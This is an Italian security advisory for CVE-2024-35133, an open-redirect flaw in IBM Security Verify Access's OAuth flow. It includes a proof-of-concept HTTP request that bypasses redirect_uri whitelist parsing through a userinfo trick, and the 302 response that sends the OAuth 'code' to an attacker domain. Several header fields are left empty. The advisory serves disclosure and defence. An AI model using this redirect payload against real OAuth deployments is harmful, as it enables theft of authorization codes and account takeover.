
Bollettino di sicurezza per CVE-2024-35133 - Con PoC
Revisione: 1.0
Impatto:
Persuadendo una vittima a visitare un sito web appositamente predisposto, un attaccante remoto potrebbe sfruttare questa vulnerabilità per falsificare l'URL visualizzato e reindirizzare l'utente verso un sito web malevolo. Ciò potrebbe consentire all'attaccante di ottenere informazioni altamente sensibili o di condurre ulteriori attacchi contro la vittima.
Gravità:
Punteggio CVSS:
CVE-ID: CVE-2024-35133
Fornitore: IBM
Prodotti Interessati:
Versioni Interessate: 10.0.0 - 10.0.8
IBM Security Verify Access è una soluzione completa per la gestione delle policy di autorizzazione e sicurezza di rete. Fornisce una protezione end-to-end delle risorse su intranet ed extranet geograficamente disperse.
Alcune caratteristiche chiave includono:
Durante un test di penetrazione del flusso OAuth per un cliente, è stata scoperta una vulnerabilità di Reindirizzamento Aperto, che consentiva la perdita della variabile "code" di OAuth.
Eludendo la logica del parser responsabile della verifica del parametro "redirect_uri" durante un flusso OAuth (sfruttando RFC 3986), l'attaccante poteva manipolare il filtro della whitelist dei domini in IBM Security Verify Access. Ciò ha provocato un reindirizzamento aperto verso qualsiasi dominio arbitrario controllato dall'attaccante. La vittima poteva essere reindirizzata a un sito malevolo mentre il dominio appariva come attendibile.
Ciò potrebbe portare all'esposizione di informazioni sensibili come il token "code" di OAuth o ad ulteriori attacchi contro la vittima.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Fare riferimento al Bollettino di Sicurezza IBM 7166712 per informazioni su patch, aggiornamento o soluzione alternativa suggerita.
Vedere Riferimenti per maggiori dettagli.
Questa vulnerabilità è stata scoperta e segnalata da:
Copyright (c) 2024 Giulio Garzia "Ozozuz"
È concessa l'autorizzazione per la ridistribuzione elettronica di questo avviso. Non può essere modificato senza esplicito consenso scritto. Per ottenere il permesso di ristampare questo avviso su altri media, contattare l'autore.
Disclaimer: Le informazioni contenute in questo avviso sono accurate al momento della pubblicazione sulla base dei dati disponibili. Non vengono fornite garanzie. Né l'autore né l'editore accettano responsabilità per danni diretti, indiretti o consequenziali derivanti dall'uso di queste informazioni.